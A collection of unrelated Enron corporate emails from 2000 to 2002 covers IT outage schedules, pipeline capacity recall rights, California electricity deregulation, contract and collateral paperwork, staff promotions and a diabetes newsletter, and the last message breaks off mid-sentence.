ENA Purpose: Migration of Networks Off Legacy Cisco Boxes Backout: Contact(s): George Nguyen 713-853-0691 FIELD SERVICES: No Scheduled Outages. INTERNET: No Scheduled Outages. MESSAGING: Impact: Corp Notes Time: Fri 5/4/2001 at 9:00:00 PM CT thru Sat 5/5/2001 at 1:00:00 AM CT Fri 5/4/2001 at 7:00:00 PM PT thru Fri 5/4/2001 at 11:00:00 PM PT Sat 5/5/2001 at 3:00:00 AM London thru Sat 5/5/2001 at 7:00:00 AM London Outage: cNotes Server Reboots Environments Impacted: All users on any of the mailservers listed below Purpose: Scheduled @ 2 week interval Backout: Make sure server comes up. Contact(s): Trey Rhodes (713) 345-7792 Impact: EI Time: Fri 5/4/2001 at 9:00:00 PM CT thru Sat 5/5/2001 at 1:00:00 AM CT Fri 5/4/2001 at 7:00:00 PM PT thru Fri 5/4/2001 at 11:00:00 PM PT Sat 5/5/2001 at 3:00:00 AM London thru Sat 5/5/2001 at 7:00:00 AM London Outage: EI Notes Server Maintenance Environments Impacted: EI Local/Domestic/Foreign Sites Purpose: Scheduled @ 2 week interval Backout: N/A Contact(s): David Ricafrente 713-646-7741 MARKET DATA: No Scheduled Outages. NT: No Scheduled Outages. OS/2: No Scheduled Outages. OTHER SYSTEMS: Impact: Corp, OTS, ETS DATE: MAY 15, 2001/2/2001 at 5:30:00 PM Outage: Migrate DSS Server to GTHOU-APPSQ03P Environments Impacted: DSS users will not be able to access the old server (ENEDS01_ADAPT)after this date Purpose: The existing server is outdated, migrating to SQL 2000 provides increased functionality and conforms to database platform requirements. Backout: Contact(s): Mary Vollmer 713-853-3381 Joe Hellsten 713-853-7346 713-545-4164 Impact: EBS Time: Fri 5/4/2001 at 8:00:00 PM CT thru Fri 5/4/2001 at 10:00:00 PM CT Fri 5/4/2001 at 6:00:00 PM PT thru Fri 5/4/2001 at 8:00:00 PM PT Sat 5/5/2001 at 2:00:00 AM London thru Sat 5/5/2001 at 4:00:00 AM London Outage: EIGRP Integration - EBS and ENW Environments Impacted: All Purpose: The EBS network is being integrated into the ENW network. As part of the integration, we will need to bring up EIGRP process 5 on the EBS networking devices. This is the first step in the routing integration. Since ENW is already static routing to EBS and EBS is static routing and to ENW, the impact should be nil. Backout: Remove eigrp process 5 from iah-ecn44-rtr3.enron.net Contact(s): Dennis McGough 713-345-3143 Scott Shishido 713-853-9780 Impact: CORP Time: Sat 5/5/2001 at 12:00:00 AM CT thru Sat 5/5/2001 at 1:00:00 AM CT Fri 5/4/2001 at 10:00:00 PM PT thru Fri 5/5/2001 at 11:00:00 PM PT Sat 5/5/2001 at 6:00:00 AM London thru Sat 5/5/2001 at 7:00:00 AM London Outage: Elvis webserver maintenance. Environments Impacted: Internet Web pages. Purpose: Physically stabilize the server in the rack. Backout: Leave server on shelf unracked reboot the server Contact(s): Malcolm Wells 713-345-3716 Impact: CORP Time: Fri 5/4/2001 at 6:00:00 PM CT thru Fri 5/4/2001 at 8:00:00 PM CT Fri 5/4/2001 at 4:00:00 PM PT thru Fri 5/4/2001 at 6:00:00 PM PT Sat 5/5/2001 at 12:00:00 AM London thru Sat 5/5/2001 at 2:00:00 AM London Outage: ClearCase Patch Environments Impacted: Corp Purpose: This patch will resolve several issues involving the MVFS (ClearCase file system.) Backout: Remove the patch Contact(s): Troy Beyer 713.345.8316 713.406.1782 SITARA: No Scheduled Outages. SUN/OSS SYSTEM: No Scheduled Outages. TELEPHONY: No Scheduled Outages TERMINAL SERVER: No Scheduled Outages. UNIFY: No Scheduled Outages. ----------------------------------------------------------------------------------------------------------------------------- FOR ASSISTANCE (713) 853-1411 Enron Resolution Center Specific Help: Information Risk Management (713) 853-5536 SAP/ISC (713) 345-4727 Unify On-Call (713) 284-3757 [Pager] Sitara On-Call (713) 288-0101 [Pager] RUS/GOPS/GeoTools/APRS (713) 639-9726 [Pager] OSS/UA4/TARP (713) 285-3165 [Pager] CPR (713) 284-4175 [Pager] EDI Support (713) 327-3893 [Pager] EES Help Desk (713)853-9797 OR (888)853-9797
We are just looking for further verfication that the RErecall can be enacted on 24 hours notice regarding of the term of the proposed recall. I believe there are some distinctions relative to the requested term. To the extent that there is a perpetual 24 hour RErecall (is 24 hours based on date recall is effectuated or the date gas flows pursuant to recall?), PG&E paid $58 million for protection that is not worth very much. Just looking for greater clarification. To the extent it may help us with our position regarding the ability to turn back the 200 M2/d of capacity, it may be worth the expense to have independent verfication. Thanks, STeph -----Original Message----- From: Cantrell, Rebecca W. Sent: Friday, August 17, 2001 12:02 PM To: Miller, Stephanie; Lawner, Leslie Cc: Tycholiz, Barry Subject: RE: Block III Recall Rights Steph: Exactly what are you looking for - I'm not sure we could give you an opinion of the mechanics. If you remember, we looked at this issue back in March and I sent you the e-mail message below. Since then, FERC has issued orders in Docket No. RP00-241 on 3/28/2001 and 6/11/2001 which reaffirmed its rulings in the orders discussed below. There is no discussion in any of the orders on the specific mechanics of the recall other than what I already noted, namely, if the capacity has been recalled by El Paso or a shipper to serve a PG&E market, and the original shipper wants it back, it can re-recall the recalled capacity on 24 hours notice as long as it is using all of its other Block II capacity. If you need something more "legal", we'll see what we can do. If we have to go to Bracewell for a law firm legal opinion, there would be a charge since they'd have to do the same research before they could sign off on one. From: Rebecca W Cantrell 03/27/2001 04:38 PM To: Stephanie Miller/Corp/Enron@ENRON cc: Subject: Re: block II I would note also that the recent reallocation of Topock rights takes care of one of the issues -- namely that El Paso allowed Dynegy to take Block II capacity to SoCal Topock. The 4/14/00 order should have taken care of it, except for El Paso's position that they had capacity at Topock in the aggregate so they weren't overselling it. Order Date Block II Rulings 6/14/2000 Denial of Rehearing by Operation of Law Denies Indicated Shippers request for rehearing of 4/14/00 order. 4/14/2000 Order on Rehearing (Enron) Clarifies the January 19 order to provide that El Paso may remarket the PG&E turnback capacity, including Block II, for primary delivery to delivery points other than PG&E Topock if capacity is available at those other delivery points. 1/19/2000 Order on Negotiated Rate Transactions (Enron & Williams) Block II capacity has primary delivery rights only at PG&E Topock and alternative rights at the other Topock delivery points. Rejects CPUC argument against the recall provisions, which are the same as ultimately accepted in the Dynegy deal (see 10/19/99, 7/29/99, 9/17/98 and 6/11/98 orders) and provide (1) that there is no right of recall if the Block II capacity is simply idle, (2) that the capacity may be recalled if it is being used to serve points other than those behind PG&E Topock, and (3) if so recalled, it may be recalled by the original shipper for its own use in the PG&E service territory upon 24 hours notice. Clarifies, as in Dynegy, that the shipper (Enron) must use all its other Block II capacity before recalling other Block II capacity, but is not required to use Block I or Block III capacity first. 10/19/1999 Order on Rehearing and Clarification (Dynegy) Denies rehearing of 7/29/99 order 7/29/1999 Order on Rehearing and Compliance Filing (Dynegy) Affirms that PG&E and the CPUC are entitled to have the Block II capacity recalled to northern California even if it is under contract [to Dynegy]. Reverses previous ruling -- does not require that all other capacity to California be utilized before Block II capacity can be recalled. Per Settlement, recalling shipper must pay max rate to recall if its contract is one month or less. If for more than one month, the rate must equal or exceed the rate of the existing shipper. On 24 hours notice, the existing shipper (i.e., Dynegy) may recall for its own use to serve northern California markets, capacity that was recalled for use by other shippers, even if those shippers are willing to pay a higher rate. Clarifies that if the Block II capacity is idle but is not being used to serve areas outside of northern California, [Dynegy] may hold the capacity without any obligation to release it. 9/17/1998 Letter Order on Compliance Filing Requires the Dynegy/El Paso agreement to clearly state that Block II capacity was recallable even though Dynegy had a minimum take requirement. Requires El Paso to eliminate use of alternative delivery points as the defining point for the service that would be recalled -- issue is markets served, not delivery points. Requires elimination of a clause requiring recalling shipper to submit a sworn statement that no capacity was available on other pipelines. 6/11/1998 Shippers in northern California cannot recall Block II capacity simply because it is not actually being used by [Dynegy]. Block II is recallable if [Dynegy] is using it to serve end users not within PG&E's service territory. Shippers who want to recall Block II capacity must have an actual need and may only recall if firm capacity is not available to PG&E's service territory via El Paso or via any other pipeline available to the shipper. -----Original Message----- From: Miller, Stephanie Sent: Friday, August 17, 2001 9:22 AM To: Cantrell, Rebecca W.; Lawner, Leslie Cc: Tycholiz, Barry Subject: Block III Recall Rights Further to our discussions about our EPNG capacity: Our research had resulted in an opinion that there is little value associated with PG&E's (northern CA customers) recall rights on Block III capacity. While it was not part of the original settlement, the 24 hour RE-recall rights to the shipper of record appear to give PG&E a DAILY call on capacity at best. Because we have pieced this opinion together based upon rulings in various proceedings, we would like a more formal regulatory/legal opinion of the mechanics of the RE-recall provision that has been developed over time. Is this something that either of you can provide or should it go to Randy? The results of this inquiry will set the tone of our next round of dicussions with EPNG. By the way, still waiting on their written reponse to our letter..... I think they have bigger fish to fry. Please advise. Stephanie <Embedded Picture (Metafile)>
FYI ---------------------- Forwarded by Gavin Dillingham/ENRON_DEVELOPMENT on 08/28/2000 08:05 AM --------------------------- [email protected]@enron.com on 08/28/2000 07:36:46 AM To: [email protected] cc: Subject: fyi Please send to the distribution list ---------------------- Forwarded by Steven J Kean/NA/Enron on 08/28/2000 07:36 AM --------------------------- From: Cindy Derecskey on 08/25/2000 04:01 PM To: Steven J Kean/NA/Enron@Enron, James D Steffes/HOU/EES@EES, Richard Shapiro/HOU/EES@EES cc: Subject: fyi ----- Forwarded by Cindy Derecskey/Corp/Enron on 08/25/2000 04:00 PM ----- "Martin, Kim" <[email protected]> on 08/25/2000 03:51:17 PM To: "'[email protected]'" <[email protected]> cc: Subject: fyi Didn't know if you saw this column in today's LA Times, but he makes some good arguments... > JAMES FLANIGAN: Simple Steps May Ease Self-Inflicted > Electricity Woes > Los Angeles Times -- August 25, 2000 [Return to Headlines] > > > Publication Date: Friday August 25, 2000 > Page C-1 > Los Angeles Times (Home Edition) > Copyright 2000 / The Times Mirror Company > By JAMES FLANIGAN > > Let's be clear, the fact that the state botched the job of > deregulation to begin with is one reason California's electricity market > is such a mess. > > But failure to build a single new power plant in the state > even as California's economy expanded its use of electricity is the basic > cause of today's shortages and soaring prices in San Diego, Orange County > and other areas. > > Still, some simple steps can be taken by regulators, > legislators and Gov. Gray Davis to provide immediate relief. > > The state's major utilities should be free to buy power > wherever they can get it. They should not have to buy exclusively from the > Power Exchange, the Pasadena-based power pool that was set up by the 1998 > deregulation to achieve auction-based prices for roughly 80% of the > state's electricity. > > Approval should be expedited for adding smaller generating > plants that supply power at times of peak demand. That could alleviate a > tight supply-demand situation over the next year or two while larger > plants are built. > > Long term, the state needs to speed up the approval process > for building new electricity plants. The state also should force utilities > to invest in the still-regulated system of power transmission lines, which > now has weaknesses in the San Diego and San Francisco areas. > > Perhaps the most glaring fact about California's electricity > problem is how few companies have stepped up to supply power to this > enormous market, the nation's biggest. Only 15 or so suppliers, including > federal agencies, the state's own utilities, municipal companies and > private generating firms, supply power to California's system. > > By contrast, Pennsylvania, which has an electricity market > less than 12% the size of California's, has 130 separate suppliers of > electricity today, reports John Quain, chairman of that state's Public > Utility Commission. > > It's no coincidence that Pennsylvania has seen monthly > electric bills drop 3% on average since deregulation. "It's worked out > terrifically," Quain says. > > What did California do wrong? It allowed the state's major > utilities--Pacific Gas & Electric, Southern California Edison and San > Diego Gas & Electric--to recover 100% of their unrecovered or "stranded" > costs for nuclear and hydroelectric plants and for past power purchase > schemes mandated by the California legislature to encourage alternative > sources of energy. > > Then California's legislators told the utilities to sell > their conventional power plants to private generating companies, all of > which would sell their power to a central Power Exchange. > > The California scheme was flawed, at once over-regulated and > yet commercially clueless in not foreseeing trouble from a single power > pool fed by only a handful of suppliers. > > How did Pennsylvania do it? It allowed the state's utilities > to recover no more than 67% of their stranded costs for nuclear > plants--reasoning that company shareholders should accept some of the risk > of their investments. And rather than set up a central power exchange, the > state allowed its utilities and newcomers to the state's electric system > to compete for business. > > Competition, after all, is what deregulation is supposed to > encourage. And competition is not happening in California. > > It should be noted that the summer is relatively cool in the > East this year and extraordinarily hot throughout the West. All the > Western states are suffering electricity problems. That's another reason > for California's trouble. > > Normally, 28% of California's electricity comes from U.S. > and Canadian government systems and from utilities in Oregon and > Washington, Nevada and Arizona. But this year, because of lower > hydroelectric supplies and higher demand from booming economies in those > other states, power for California is in shorter supply and more expensive > when the state can get it. Now there are accusations that some suppliers > to California have taken advantage of their market leverage to extract > premium prices for power. > > There's nothing illegal in angling for a better price or in > using futures markets and other trading techniques, as some generators may > have done. If any stepped over the line to illegal collusion, federal and > other investigations will determine the facts. > > But who gave the generators the market leverage to exploit > us? The California regulators, legislators and utilities did. Told to sell > their generating plants in 1998, the utilities sold dozens of plants in > package deals of two and three to single buyers. They received premium > prices from buyers such as AES Corp., Duke Energy, Southern Co. Reliant > Energy, Dynegy and NRG. The premiums were paid for the market leverage > that multiple plants afforded the buyers. > > Nobody in the utilities reckoned that they were handing > market leverage to potential commercial adversaries. Nobody in the > Legislature or the regulatory staffs reckoned that the central Power > Exchange could be held up by market leverage. > > As outsiders often say about Californians: "Maybe it's the > sunshine makes them slow." > > (END) > > 05:23 EDT August 25, 2000 > Copyright , 2000 Times Mirror Company > > > >
This is an easy one. 1400 Smith, EB3803B. Thanks! Marie -----Original Message----- From: "Hudson, Roeline" <[email protected]>@ENRON [mailto:IMCEANOTES-+22Hudson+2C+20Roeline+22+20+3CHudsonR+40teai+2Ecom+3E+40ENRON@ENRON.com] Sent: Wednesday, October 03, 2001 4:28 PM To: Heard, Marie Subject: RE: Fee Letter Hi - You didn't think you would away today without another e-mail from me, did you???? (just joking) When I courier these documents over to you tomorrow I will send them to 1400 Smith Street, but don't I have to put in a building number or room number for you in order that it will get to you for sure? Let me know what that is - Thanks, Until tomorrow, Roeline > -----Original Message----- > From: [email protected] [SMTP:[email protected]] > Sent: Wednesday, October 03, 2001 3:28 PM > To: [email protected] > Subject: RE: Fee Letter > > Hi, Roeline: > > We would prefer to sign the fee letter at the same time we sign the > assignments. Yes, we will sign enough originals of all documents so that > all parties can have an original. > > Hopefully we can get this wrapped up tomorrow, as I will be out of the > office Friday. > > Marie > > -----Original Message----- > From: "Hudson, Roeline" <[email protected]>@ENRON > > [mailto:IMCEANOTES-+22Hudson+2C+20Roeline+22+20+3CHudsonR+40teai+2Ecom+3E+ > [email protected]] > > > Sent: Wednesday, October 03, 2001 3:26 PM > To: Heard, Marie > Subject: RE: Fee Letter > > Marie - > > One more question - I received some of these in duplicate, and some of > them > were original only. Like the Termination Agreement that you just > couriered > over to me - I only got one original from you, and there are two > signatures. > We would like to have an original signature as well - so are we going > to > do > this after the fact? That would be okay by me, because I want to have > them > all signed and off my desk - so just let me know how you think we > should > do > this. > > Thanks, Marie - > Roeline > > > > -----Original Message----- > > From: [email protected] [SMTP:[email protected]] > > Sent: Wednesday, October 03, 2001 1:32 PM > > To: [email protected] > > Cc: [email protected] > > Subject: RE: Fee Letter > > > > Hi, Roeline! > > > > I'm sending the original revised Termination Agreement over to you > this > > afternoon. Let me know if you have any questions or need anything > else. > > > > Marie > > > > -----Original Message----- > > From: "Hudson, Roeline" <[email protected]>@ENRON > > > > > > [mailto:IMCEANOTES-+22Hudson+2C+20Roeline+22+20+3CHudsonR+40teai+2Ecom+3E+ > > [email protected]] > > > > > > Sent: Wednesday, October 03, 2001 9:52 AM > > To: Heard, Marie > > Subject: RE: Fee Letter > > > > Hi Marie, > > > > The fee letter looks good - and I have all of the paperwork here, > > except > > of > > course the Termination letter for ENA Deal #0619, which you > indicated > > the > > Confirmation Desk was workin on. So things look good to go. > > > > I have the paperwork back from both Dynegy and Sempra, but United > Oil's > > letters is being reviewed by its lawyer today. He was away for > the > > past > > two > > days. As soon as I have everything together I will courier the > > complete > > package to you - one detail that I forgot to mention - right now I > have > > fax > > copies only, and I hope it will suffice until I can get original > > signatures. > > If it does not, then we are in real trouble!! So say it is okay - > and > > I > > will work on the originals after the deal is completed. > > > > Thanks for all your help, Marie. > > > > Roeline > > > > > > > > > -----Original Message----- > > > From: Heard, Marie [SMTP:[email protected]] > > > Sent: Wednesday, October 03, 2001 8:51 AM > > > To: [email protected] > > > Cc: Diamond, Russell > > > Subject: Fee Letter > > > > > > Hi, Roeline! > > > > > > Attached for your review is a draft of the proposed fee letter > in > > > connection with the assignments and terminations. Please let me > know > > if > > > you have any comments. > > > > > > Our Confirmation Desk is in the process of revising the > termination > > of > > > ENA Deal No. NL0619.1 to delete the fee reference, and I will > forward > > it > > > to you when ready. > > > > > > Please let me know when you have signoff on the other documents > and I > > > will finalize and have executed by ENA and forward to you. > > > > > > Thanks! > > > > > > Marie > > > > > > > > > <<060ltr (torch).doc>> > > > > > > > > > > > > ********************************************************************** > > > This e-mail is the property of Enron Corp. and/or its relevant > > affiliate > > > and may contain confidential and privileged material for the > sole > use > > of > > > the intended recipient (s). Any review, use, distribution or > > disclosure by > > > others is strictly prohibited. If you are not the intended > recipient > > (or > > > authorized to receive for the recipient), please contact the > sender > > or > > > reply to Enron Corp. at [email protected] > and > > > delete all copies of the message. This e-mail (and any > attachments > > hereto) > > > are not intended to be an offer (or an acceptance) and do not > create > > or > > > evidence a binding and enforceable contract between Enron Corp. > (or > > any of > > > its affiliates) and the intended recipient or any other party, > and > > may > > not > > > be relied on by anyone as the basis of a contract by estoppel or > > > otherwise. Thank you. > > > > > > ********************************************************************** > > << > > > File: 060ltr (torch).doc >>
Are the attached Deemed ISDA's ready to go in order to send confirms out? If so, should the confirms group use the attachments from Carol's email on the 17th or from her email on the 18th? Thank you: Derek ---------------------- Forwarded by Derek Bailey/Corp/Enron on 04/20/2001 01:17 PM --------------------------- Mog Heu 04/20/2001 01:12 PM To: Derek Bailey/Corp/Enron@ENRON cc: Subject: AIG Confirms ---------------------- Forwarded by Mog Heu/NA/Enron on 04/20/2001 01:04 PM --------------------------- Caroline Abramo 04/18/2001 12:59 PM To: Mog Heu/NA/Enron@Enron cc: Subject: Confirms ---------------------- Forwarded by Caroline Abramo/Corp/Enron on 04/18/2001 01:59 PM --------------------------- Carol St Clair @ ECT 04/17/2001 04:46 PM To: Caroline Abramo/Corp/Enron@Enron cc: Paul Radous/Enron@EnronXGate, Brent Hendry/NA/Enron@Enron, Sara Shackleton/HOU/ECT@ECT Subject: Confirms Enclosed are drafts of the 2 confirms. Alos enclosed is a comparison of the 2 to show the differences. Carol St. Clair EB 3889 713-853-3989 (Phone) 713-646-3393 (Fax) [email protected] ---------------------- Forwarded by Caroline Abramo/Corp/Enron on 04/18/2001 01:59 PM --------------------------- Carol St Clair @ ECT 04/17/2001 04:54 PM To: [email protected] cc: Brent Hendry/NA/Enron@Enron, Sara Shackleton/HOU/ECT@ECT, Paul Radous/Enron@EnronXGate, Caroline Abramo/Corp/Enron@Enron Subject: Cash Collateral Christopher: We have done a trade with a Bermuda hedge fund and have negotiated collateral provisions that may require them to post csah to us. The agreement will be governed by either Texas or New York law. We need your advice on how to perfect our interest in any cash posted to us that we would hold in an account in the United States. Could you please call either me or Sara Shackelton (713)853-5620 if possible tomorrow or you can send me an e-mail if that is easier. I'm hoping that our possession of the cash is enough. Sorry for the short fuse on this. If you need any additional information, please contact me or Sara. I will be unavailable from 9-11 and 2-3 tomorrow Houston time. Carol St. Clair EB 3889 713-853-3989 (Phone) 713-646-3393 (Fax) [email protected] ---------------------- Forwarded by Caroline Abramo/Corp/Enron on 04/18/2001 01:59 PM --------------------------- Carol St Clair @ ECT 04/18/2001 10:18 AM To: "Chris Garrod" <[email protected]>@ENRON cc: Caroline Abramo/Corp/Enron@Enron, Paul Radous/Enron@EnronXGate, Sara Shackleton/HOU/ECT@ECT, Brent Hendry/NA/Enron@Enron Subject: Re: Cash Collateral Chris: Thanks for your prompt response. I think that we do need to register the charge document which in this case would be the confirmation that will be executed. Can you provide me with an estimate of the total cost? Does everyone at Enron agree? Caroline, I will redraft the Bermuda confirm to change from LC's to cash and send to you. Please make sure that the counterparty is aware that we plan to register/file the confirm in Bermuda. Carol St. Clair EB 3889 713-853-3989 (Phone) 713-646-3393 (Fax) [email protected] "Chris Garrod" <[email protected]> 04/18/2001 09:50 AM To: <[email protected]> cc: <[email protected]>, <[email protected]>, <[email protected]>, <[email protected]> Subject: Re: Cash Collateral Dear Carol Under Bermuda law, there is no real concept of "perfecting" security since it is not necessary to ensure the enforceability in Bermuda that a charge be registered in Bermuda. However, although it is not necessary for a security interest to be registered in order for it to be valid, the charge document itself can be registered in Bermuda in the Register of Charges in accordance with Section 55 of the Companies Act 1981 in order to ensure the priority in Bermuda of the charge. On registration, any charge evidenced in the charging document will have priority over any unregistered competing charge or any subsequently registered competing charge in respect of the assets which are the subject of the charge (i.e. the cash). If the agreement will be governed by either Texas or New York law, it will be a matter of the laws of either Texas or New York as to the actual nature of the security interest which is created by the charge. If you would like us to effect the registration of the charge, we would need an original (or a certified true copy) of the executed document which creates the security interest. There is no time limit on such registration. However, please note that, in addition to our professional fees, there is a filing fee of $446 which is payable in respect of the registration. I trust that the above is of some assistance. If you have any questions please do not hesitate to contact me. Kind regards. Chris Garrod Christopher Garrod Conyers Dill & Pearman Clarendon House, 2 Church Street Hamilton HM 11, Bermuda Direct dial 441 299 4923 Fax: 441 292 4720 email [email protected] >>> <[email protected]> 04/17/01 06:54PM >>> Christopher: We have done a trade with a Bermuda hedge fund and have negotiated collateral provisions that may require them to post csah to us. The agreement will be governed by either Texas or New York law. We need your advice on how to perfect our interest in any cash posted to us that we would hold in an account in the United States. Could you please call either me or Sara Shackelton (713)853-5620 if possible tomorrow or you can send me an e-mail if that is easier. I'm hoping that our possession of the cash is enough. Sorry for the short fuse on this. If you need any additional information, please contact me or Sara. I will be unavailable from 9-11 and 2-3 tomorrow Houston time. Carol St. Clair EB 3889 713-853-3989 (Phone) 713-646-3393 (Fax) [email protected] ---------------------- Forwarded by Caroline Abramo/Corp/Enron on 04/18/2001 01:59 PM --------------------------- Carol St Clair @ ECT 04/18/2001 10:37 AM To: Caroline Abramo/Corp/Enron@Enron cc: Paul Radous/Enron@EnronXGate, Sara Shackleton/HOU/ECT@ECT, Brent Hendry/NA/Enron@Enron, "Chris Garrod" <[email protected]> Subject: Revised Confirm Enclosed are clean and marked versions of the Bermuda confirm. Carol St. Clair EB 3889 713-853-3989 (Phone) 713-646-3393 (Fax) [email protected]
Hi Vince, Scott Pleus (listed below in the director promotion section) is bandwidth-trading backoffice person we,ve been working with. I have known Scott from EBS since he and I started around the same time. In fact, I was one of the first people to talk to Sally Beck about booking some of our network positions*at which time I met Scott. I know we have discussed this matter many times before, but this is a specific example of how people at all functional areas are benefiting from EBS' rapid 'growth.' Scott has been at Enron for about the same time I have been. He came from another energy company's backoffice before that. As for my specific situation, after our discussion yesterday, I understand clearly what happened. It appears bad luck had a lot to do with it!!! Thanks for looking into the promotion in the first place and I am certain that you'll push the promotion through at the earliest convenience of the HR folks! Kind Regards, Ravi. ----- Forwarded by Ravi Thuraisingham/Enron Communications on 02/08/00 09:22 AM ----- Sally Beck@ENRON Sent by: Enron Announcements@ENRON 02/07/00 07:01 AM To: All ENA Domestic Employees cc: Subject: Energy Operations Promotions ENA Energy Operations Sally Beck Vice President of Energy Operations I am pleased to announce the following promotions effective February 1 within ENA Energy Operations. These individuals have been promoted in recognition of their outstanding performance and their contributions to the continuing success of Enron North America. Please join me in congratulating these employees on their promotions. Promotions to Senior Director Kristin Albrecht serves as Business Controller for ENA,s power business. Along with Leslie Reeves, Kristin ensures that power transactions are handled accurately and smoothly from beginning to end. Kristin,s primary focus is on risk controls and daily reporting of positions and p&l for East Power trading, West Power trading and Genco operations. Brenda Herod serves as Business Controller for ENA,s assets business, working with the Gas Assets group and the Texas trading desk. Her responsibilities include global contracts and facilities, risk management, confirmations, gas scheduling, volume management, settlements and regulatory compliance for Houston Pipeline, LRC and Enron Midstream Services. Leslie Reeves is a Business Controller for ENA,s power business, working closely with Kristin Albrecht in managing mid and back office support for the East, West and Genco power trading groups. Her primary responsibilities are documentation and settlements, with a focus on contract administration, cash forecasting and cash management. Mary Solmonson leads ENA,s Global Database Management Group, collecting and validating information on our customers, contracts, pipelines and facilities, as well as published prices. These activities support overall Energy Operations responsibilities from Risk to Logistics to Settlement. In addition, Mary has been instrumental in the promotion and implementation of the Global systems across Enron to provide control, consistency, and common data throughout the organization. Promotions to Director Scott Pleus serves as Business Controller for Enron,s Emerging Products. These businesses include Bandwidth, Pulp and Paper, and Weather. His primary responsibilities include day-to-day functions of risk management, confirmations, pulp and paper scheduling, and settlements as well as long term system development. Sheri Thomas led ENA,s natural gas off-system settlements function throughout 1999. Her responsibilities included cash forecasting, collections, and accountability for receivables and payables for ENA,s gas business in the East, West and Central regions of the US. Sheri accepted a new assignment in January 2000 and is now managing the Enron Online operations. Promotions to Manager Bennett Kaufman manages the risk management administration function for the Equity Trading and Debt Trading groups. He has also had experience in supporting the options book for natural gas derivatives trading. Prior to joining Enron in early 1998, Bennett worked in trading operations for investment banking firms in New York. Richard McKeel is the Systems Integration Analyst within Global Database Management, overseeing the change management process and new software development needed to interface the Global applications with strategic systems ) Sitara, Unify, EnPower, Solarc, SAP, and EnronOnline. Other Promotions Specialist to Senior Specialist: Analyst to Specialist: Sylvia Campos ) Deal Compliance Contract Records Tara Eslick ) Financial Trading Risk Management Kam Keiser ) Gas Risk Management- Central Desk Victoria Versen ) Gas Logistics - East Desk Phillip Love ) Risk Controls Operational Analysis Jeff Coats ) Gas Risk Management - Central Desk Monica Lande ) West Power Risk Management (Portland) Senior Clerk to Staff: Trang Le ) Strategic Operations ) Project Unify John Postlewaite ) East Power Risk Management Anthony Campos ) Deal Compliance Contract Records Diane Seib ) Documentation (Calgary) Kori Loibl ) Gas Risk Management - Financial Books Donnie Vinson ) West Power Risk Management (Portland) Imelda Frayre ) Strategic Operations - Project Sitara Clerk to Senior Clerk: Staff to Specialist: Leslie Smith ) Information & Records Management Amy Degeyter ) Power Documentation Melinda Whalen ) Documentation (Calgary) Michael Nguyen ) Emerging Products Risk Management Sherlyn Schumack ) Logistics Volume Management Karie Hastings ) Strategic Operations - Project Sitara In addition, Peggy Hedstrom and Brent Price were promoted to Vice President, as announced in the memo issued by Enron Corp. Office of the Chairman. Peggy leads Energy Operations for Enron Canada, with responsibility for risk management, documentation and gas logistics. Peggy also serves as a key interface with Canadian pipelines as a member of several industry committees. Brent is the Senior Business Controller for Gas Trading Operations in the U.S. His responsibilities include risk management, confirmations, volume management and settlements for the East, West and Central regions. He also provides operational expertise in the due diligence phase of the evaluations of joint ventures and acquisitions.
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Did you know that by registering with the ADA Web site, diabetes.org, we can provide you with information that is most interesting to you? Simply click on the link below. Once you have chosen your username and password, please take a few moments to tell us what type of diabetes information you are looking for and we'll do the rest! Try it and see: http://www.you-click.net/GoNow/a16366a51643a99406973a5 IN THE NEWS... Medicare Funds Nutritional Therapy On January 1, 2002, Medicare began covering medical nutritional therapy for many recipients with diabetes and kidney diseases. With this new benefit, around 4.5 million Medicare recipients with diabetes and an estimated 110,000 with kidney disease are eligible for medical nutritional therapy aimed at helping them learn to make healthy eating choices and better manage their conditions. The comments of Anne Daly, the Association's President, Health Care & Education, are featured in this article from The Washington Post covering the new benefit. To learn more, click here: http://www.you-click.net/GoNow/a16366a51643a99406973a0 FDA Approves Generic Metformin The US Food and Drug Administration recently granted approval to eleven generic drug manufacturers to market generic versions of Bristol-Myers Squibb Company's popular diabetes medication Glucophage (metformin). Glucophage is taken orally in pill form, and is currently the world's top-selling diabetes medication. The drug reduces blood sugar levels by curbing production of glucose by the liver. To learn more, click here: http://www.you-click.net/GoNow/a16366a51643a99406973a1 Sexual Problems in Men With Diabetes, and More from Diabetes Care According to a study published in the February issue of Diabetes Care, the Association's journal of clinical research, more than one-third of adult men with diabetes experience sexual dysfunction. Also in the February issue, a separate study shows that a particular type of weight-loss surgery can dramatically improve the health of severely obese people with diabetes, and in some cases even send the disease into remission. To learn more, click here: http://www.you-click.net/GoNow/a16366a51643a99406973a2 A Major Gift to the Research Foundation Terrance H. Gregg and Louise Cotting-Gregg, of Los Angeles, California, have pledged a total of $1,050,000 for the study of diabetes and pregnancy, to the American Diabetes Association Research Foundation. Mr. Gregg, President of Medtronic MiniMed, the world's leading maker of insulin pump devices, sits on the Association's Research Foundation Board of Directors, and will be honored by the Association's Los Angeles office as a Father of the Year on June 6, 2002. To learn more, click here: http://www.you-click.net/GoNow/a16366a51643a99406973a3 COMMUNITY AND RESOURCES... Diabetes Forecast Live! Catch the replay of the January edition, "What's Hot in New Diabetes Products." Diabetes Forecast Live! is a monthly webcast that provides real-time interviews with diabetes experts, as well as special guests. This year has brought a bumper crop of new diabetes products that can help you manage your diabetes--click and hear more about them here: http://www.you-click.net/GoNow/a16366a51643a99406973a6 ONLINE SHOPPING... Type 2 Diabetes Your Healthy Living Guide From eating right and exercising to choosing a health care team, this book is a "must-have" guide when living with type 2 diabetes. "Finally, a book with all the information you need in one place. Everyone should own this book!" David S. Schade, MD, Professor of Medicine The University of New Mexico School of Medicine For more information or to order this book, click here: http://www.you-click.net/GoNow/a16366a51643a99406973a4 ______________________________________ Some of the articles in Diabetes E-News Now! are generated from wire service stories only and not by the American Diabetes Association. Therefore, the American Diabetes Association has no control over the editorial or grammatical content and does not endorse the information contained in the articles. Neither the American Diabetes Association nor any third-party provider of information guarantees the accuracy, completeness, or usefulness of any content, nor its merchantability or fitness for any particular purpose. The articles included in this offer are accessible for 21 days past the issue date of this offer. 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Christi, As I have been thinking about this problem, my opposition to a standard model is declining, partly out of frustration with the slow progress being made. I think, however, that we ought to think about the potential consequences of recommending a standard model. If we simply endorse PJM, then we may inadvertently get its warts as well -- no secondary transmission market, ICAP market, etc. I think we are considering the same thing approach as was reported by Charles Yeung's in his note on Tuesday's Inter-RTO Coordination (Seams) Conference: "Harvey Reed, Constellation Power, suggested that FERC impose a standard tariff for all RTOs to work from that did not restrict RTOs from filing different proposals, but would limit their ability to diverge from a single market model." In addition to the standard model, there needs to be a deadline for either filing the tariff or for filing the standard tariff. Without a "feet to the fire" feature, nothing the grand stall will continue. In arguing for a standard model, the 